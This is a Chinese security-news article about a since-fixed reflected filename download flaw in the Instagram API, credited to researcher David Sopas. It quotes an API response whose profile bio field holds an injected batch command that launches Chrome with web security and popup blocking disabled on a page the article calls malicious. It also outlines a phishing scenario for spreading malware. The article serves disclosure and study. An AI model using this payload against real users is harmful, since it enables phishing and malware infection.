利用Instagram API制造“以假乱真”的恶意分享链接

2015-03-27 208967人围观 ,发现 2 个不明物体 WEB安全漏洞

*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。

安全研究人员最近发现了一种利用Instagram API形成的恶意分享链接,由于这个链接指向Instagram域名,所以很容易被用户相信并下载。如果在钓鱼攻击中利用该漏洞,可以极大地提高攻击效率。

漏洞详情

这个RFD(反射型文件名下载)漏洞存在Instagram API中。通过篡改任何用户账号的访问令牌并使用一些技巧,攻击者可以创建一个恶意文件下载链接。同时由于这个链接指向Instagram域名上的合法资源,所以很难被用户觉察。

“我在Instagram API上发现了一个RFD(反射型文件名下载),不需要向URL上添加任何指令,因为我们可以使用一个持久型反射域来实现它,例如用户账号上的“Bio”域。

那么,我们需要什么呢?仅仅需要一个令牌。不过不用担心,我们只需注册一个新的账号就能得到一个令牌。下一步,插入我们想在用户账号的“Bio”域(或其他域)中使用的批处理指令。接着,我将尝试用Chrome浏览器打开一个包含恶意代码的新页面,该恶意页面可以禁用该浏览器中的大多数保护机制。”

为了构建“反射型部分”,Sopas在用户账号的“Bio”域中插入了一个批处理指令,并解释说插入到其他域也可以实现同样的功能。然后,他用Chrome浏览器打开一个包含恶意代码的新页面,该恶意页面可以禁用浏览器中的大多数保护机制。

通过分析了用户的Instagram JSON文件,然后通过修改JSON文件来实现“文件名部分”:

 https://api.instagram.com/v1/users/1750545056?access_token=339779002.4538cdb.fad79bd258364f4992156372fd01069a
 
{“meta”:{“code”:200},”data”:{“username”:”davidsopas”,”bio”:”\”||start chrome websegura.net\/malware.htm –disable-web-security –disable-popup-blocking||”,”website”:”http:\/\/websegura.net”,”profile_picture”:”https:\/\/igcdn-photos-f-a.akamaihd.net\/hphotos-ak-xaf1\/t51.2885-19\/11055505_1374264689564237_952365304_a.jpg”,”full_name”:”David Sopas”,”counts”:{“media”:0,”followed_by”:11,”follows”:3},”id”:”1750545056″}}

由于“文件名部分”的限制,这种附加方法只能在特定的浏览器中正常工作,这些浏览器包括Chrome、Opera、Chrome安卓版、安卓stock浏览器和火狐浏览器。

攻击演示视频

在他的攻击中,Sopas使用了一个特定的文件名,他创建的完整链接可以被发送到受害者的Instagram消息中。

下面的视频演示了该攻击的PoC:

Sopas假设了以下可能的攻击场景:

1、恶意用户向他所有的Instagram好友发送一条消息,其中包含一个指向恶意页面的链接。
2、受害者点击链接,检查并发现该文件存储在Instagram服务器,下载并运行它。
3、受害者感染恶意软件。

[参考来源securityaffairs,有适当修改,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)]

相关推荐
发表评论

已有 2 条评论

取消
Loading...
JackFree

冒个泡,表示我还关注着FB······

174 文章数 147 评论数 0 关注者

特别推荐

推荐关注

活动预告

填写个人信息

姓名
电话
邮箱
公司
行业
职位
css.php